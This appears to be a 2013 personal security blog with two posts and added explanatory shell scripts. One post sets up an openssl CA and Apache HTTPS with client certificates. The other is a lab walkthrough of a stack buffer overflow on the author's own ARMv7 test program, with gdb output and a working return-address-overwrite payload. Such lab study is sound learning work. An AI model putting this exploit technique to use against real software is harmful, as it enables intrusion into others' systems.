I think SSL/TLS should be part of the security hardening process. Only fools would not use cryptography in the post-PRISM era. I think what Mr. Snowden did proved one thing: Richard Stallman and the Phrack guys (I prefer to use the term "philosophical anarchist") never lied to us ;-) Well, I don't wanna bullshit about this controversial topic here... let's see how we can set up an HTTPS server with client auth.
Generate CA certificates:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp /usr/lib/ssl/misc/CA.sh .
root@d6-test:/opt/ssl# ./CA.sh -newca
CA certificate filename (or enter to create)
Making CA certificate ...
Generating a 2048 bit RSA private key
..................................+++
..............................................+++
writing new private key to './demoCA/private/./cakey.pem'
.............................................
.............................................
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/./cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5a
Validity
Not Before: Nov 19 02:08:14 2013 GMT
Not After : Nov 18 02:08:14 2016 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-shit.com
X509v3 extensions:
X509v3 Subject Key Identifier:
D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Basic Constraints:
CA:TRUE
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Copy intermediate key and certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp demoCA/private/cakey.pem ca.key
root@d6-test:/opt/ssl#
root@d6-test:/opt/ssl# cp demoCA/cacert.pem ca.crt
--------------------------------------------------------------------------------
Generate server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out server.key 2048
Generating RSA private key, 2048 bit long modulus
...+++
.................+++
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:
--------------------------------------------------------------------------------
Generate server CSR (Certificate Signing Request) with server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key server.key -out server.csr
...........................................
........................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
--------------------------------------------------------------------------------
Generate server certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt
Enter pass phrase for server.key
--------------------------------------------------------------------------------
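You can check out the cert or verify it:
--------------------------------------------------------------------------------
openssl x509 -noout -text -in server.crt
openssl verify -CAfile ca.crt server.crt
--------------------------------------------------------------------------------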
Generate client's key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out client.key 2048
Generating RSA private key, 2048 bit long modulus
..........................................................................................................................................+++
........+++
e is 65537 (0x10001)
Enter pass phrase for client.key:
Verifying - Enter pass phrase for client.key:
--------------------------------------------------------------------------------
Client's CSR:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key client.key -out client.csr
.......................................................
..............................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-info.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
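--------------------------------------------------------------------------------
Generate client's certificate with CA certificate's signature:
--------------------------------------------------------------------------------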
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5c
Validity
Not Before: Nov 19 02:28:13 2013 GMT
Not After : Nov 19 02:28:13 2014 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-info.com
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)
Sign the certificate? [y/n]:y
1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Convert to PKCS#12 format, which is recognized by Firefox:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------
Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit
root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled
Edit /etc/apache2/sites-enabled/default-ssl:
SSLCertificateFile /etc/ssl/hardened-shit/server.crt
SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key
SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt
SSLCACertificatePath /etc/ssl/hardened-shit/
SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt
SSLVerifyClient require
SSLVerifyDepth 10
Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------
Done... it should work.
BTW: I highly recommend reading these two articles if you want to know more: "Hardening Your Web Server's SSL Ciphers" and "TLS Perfect Forward Secrecy support with Apache".
I only enable the secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1
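The chain check `openssl verify -CAfile ca.crt ...` from above, run non-interactively against a throwaway CA; this is an added example, not the author's commands. It goes one step further than the post by pinning each leaf to serverAuth or clientAuth and by including a self-signed leaf of the kind `openssl req -x509` emits; all subject names and file names are constructed.

```sh
#!/bin/sh
# Added example. Every name here (CN values, file names) is constructed.

# Build a throwaway CA, CA-signed server/client certs and, for contrast,
# a self-signed leaf (what `openssl req -x509` emits) in directory $1.
make_pki() {
    (
        cd "$1" || exit 1
        # Minimal config so the run does not depend on the system openssl.cnf.
        printf '%s\n' '[req]' 'distinguished_name=dn' 'prompt=no' \
            '[dn]' 'CN=placeholder' \
            '[v3_ca]' 'basicConstraints=critical,CA:TRUE' > pki.cnf
        # -nodes leaves keys unencrypted: acceptable for a test run only.
        openssl req -x509 -config pki.cnf -extensions v3_ca -newkey rsa:2048 \
            -nodes -days 30 -subj '/CN=Example Test CA' \
            -keyout ca.key -out ca.crt 2>/dev/null || exit 1
        for role in server client; do
            openssl req -new -config pki.cnf -newkey rsa:2048 -nodes \
                -subj "/CN=$role.example.test" \
                -keyout "$role.key" -out "$role.csr" 2>/dev/null || exit 1
            # Pin each leaf to one purpose via extendedKeyUsage.
            printf 'basicConstraints=CA:FALSE\nextendedKeyUsage=%sAuth\n' \
                "$role" > "$role.ext"
            openssl x509 -req -in "$role.csr" -CA ca.crt -CAkey ca.key \
                -CAcreateserial -days 30 -extfile "$role.ext" \
                -out "$role.crt" 2>/dev/null || exit 1
        done
        openssl req -x509 -config pki.cnf -newkey rsa:2048 -nodes -days 30 \
            -subj '/CN=server.example.test' \
            -keyout selfsigned.key -out selfsigned.crt 2>/dev/null || exit 1
    )
}

# Succeed only if cert $2 chains to CA file $1 for purpose $3
# (sslserver or sslclient), judged by the ": OK" line openssl verify prints.
chains_to_ca() {
    openssl verify -CAfile "$1" -purpose "$3" "$2" 2>/dev/null | grep -q ': OK$'
}

# Demo run: print the verdict for every certificate/purpose pair.
demo_dir=$(mktemp -d) && make_pki "$demo_dir" &&
for c in server client selfsigned; do
    for p in sslserver sslclient; do
        if chains_to_ca "$demo_dir/ca.crt" "$demo_dir/$c.crt" "$p"; then
            echo "$c.crt as $p: accepted"
        else
            echo "$c.crt as $p: rejected"
        fi
    done
done
rm -rf "$demo_dir"
```
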
Just keep your mind open and suck in the experience. And if it hurts, it's probably worth it. God is Love!
Wednesday, November 27, 2013
Thursday, November 21, 2013
Hello, stack buffer overflow on Debian ARMv7
I haven't gotten my hands *dirty* for a long time, since I stopped at io-wargame lvl11. As we all know, ARM architectures are becoming sec guys' daily bread. I think it's time to begin my journey to explore what the difference is between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7 (armhf) distro. After the installation, you probably want to configure a NAT network between the host and the qemu guest. Or just use my network config.
Figuring out the memory layout is a good starting point. Take a glance at the code first, plz...
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x00008448 <+0>: push {r7, lr}
0x0000844a <+2>: sub sp, #8
0x0000844c <+4>: add r7, sp, #0
0x0000844e <+6>: str r0, [r7, #4]
0x00008450 <+8>: str r1, [r7, #0]
0x00008452 <+10>: movw r3, #34040 ; 0x84f8
0x00008456 <+14>: movt r3, #0
0x0000845a <+18>: mov r0, r3
0x0000845c <+20>: movw r1, #33797 ; 0x8405
0x00008460 <+24>: movt r1, #0
0x00008464 <+28>: movw r2, #33845 ; 0x8435
0x00008468 <+32>: movt r2, #0
0x0000846c <+36>: blx 0x8340
0x00008470 <+40>: ldr r3, [r7, #0]
0x00008472 <+42>: add.w r3, r3, #4
0x00008476 <+46>: ldr r3, [r3, #0]
0x00008478 <+48>: mov r0, r3
0x0000847a <+50>: bl 0x8404
0x0000847e <+54>: mov.w r3, #0 ==> 0x0000847e should be the return address of test()
0x00008482 <+58>: mov r0, r3
0x00008484 <+60>: add.w r7, r7, #8
0x00008488 <+64>: mov sp, r7
0x0000848a <+66>: pop {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
0x00008434 <+0>: push {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
0x00008436 <+2>: add r7, sp, #0
0x00008438 <+4>: movw r0, #34024 ; 0x84e8
0x0000843c <+8>: movt r0, #0
0x00008440 <+12>: blx 0x8358
0x00008444 <+16>: pop {r7, pc}
End of assembler dump.
Let's check the memory layout:
(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11 strcpy(buf, input);
(gdb) n
12 printf("%s \n", buf);
(gdb)
AAAABBBB
13 }
(gdb) x/12x $sp
0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141
0x7efff668: 0x42424242 0x00008400 0x7efff678 0x0000847f==> ret addr of test()
0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb
So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]
Why the hell did the addr 0x0000847e we saw above now become 0x0000847f? Weird... Does anyone know what happened?
OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A', "4\204") at victim.c:11
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�
Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17 printf("being hacked\n");
(gdb) n
Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.
Did you see this? Add 1 to fuck_me()'s addr, plz...
(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A', "5\204") at victim.c:11
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked
Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13 }
It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault
===========================
I guess exploitation on ARM would be much different from x86. I've heard that ret2libc won't work on ARM. That's really interesting and worth figuring out. Obviously, this Phrack paper and some manuals should be added to my must-read list.
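The odd addresses in this session (0x0000847f on the stack, 0x8405 and 0x8435 in the program's own output) carry the Thumb state bit: on ARMv7 a value loaded into PC by `pop {pc}` or `bx` uses bit 0 to select Thumb (1) or ARM (0) state, and the fetch happens at the address with that bit cleared. An added example, not from the original post, that decodes such values and picks the saved return address out of the `x/12x $sp` dump; the code range bounds are read off the disassembly above and are assumptions for this one binary.

```sh
#!/bin/sh
# Code range read off the disassembly on this page: lowest branch target
# shown (0x8340) up to the end of main (0x848a + 2). Assumption for this
# binary only.
TEXT_LO=0x8340
TEXT_HI=0x848c

# Split a branch target into instruction-set state and fetch address.
# Bit 0 set -> Thumb state, bit 0 clear -> ARM state; the core fetches
# from the value with bit 0 cleared.
decode_target() {
    val=$(( $1 ))
    if [ $(( val & 1 )) -eq 1 ]; then state=thumb; else state=arm; fi
    printf '%s 0x%08x\n' "$state" $(( val & ~1 ))
}

# Read gdb dump lines ("0xADDR: w0 w1 w2 w3") on stdin. Print one line for
# each word that lies in the code range and has the Thumb bit set, i.e.
# looks like a return address saved by Thumb code.
annotate_stack() {
    while read -r addr words; do
        base=$(( ${addr%:} ))
        i=0
        for w in $words; do
            v=$(( $w ))
            if [ "$v" -ge $(( $TEXT_LO )) ] && [ "$v" -lt $(( $TEXT_HI )) ] \
                && [ $(( v & 1 )) -eq 1 ]; then
                printf '0x%08x %s -> %s\n' $(( base + 4 * i )) "$w" \
                    "$(decode_target "$w")"
            fi
            i=$(( i + 1 ))
        done
    done
}

# Dump lines from the session above, with the inline "==>" note removed.
SAMPLE_DUMP='0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141
0x7efff668: 0x42424242 0x00008400 0x7efff678 0x0000847f
0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb'

printf '%s\n' "$SAMPLE_DUMP" | annotate_stack
# The two values tried in the session: the even one selects ARM state, so
# the Thumb bytes at 0x8434 are decoded as ARM instructions (the SIGILL run).
decode_target 0x8434
decode_target 0x8435
```
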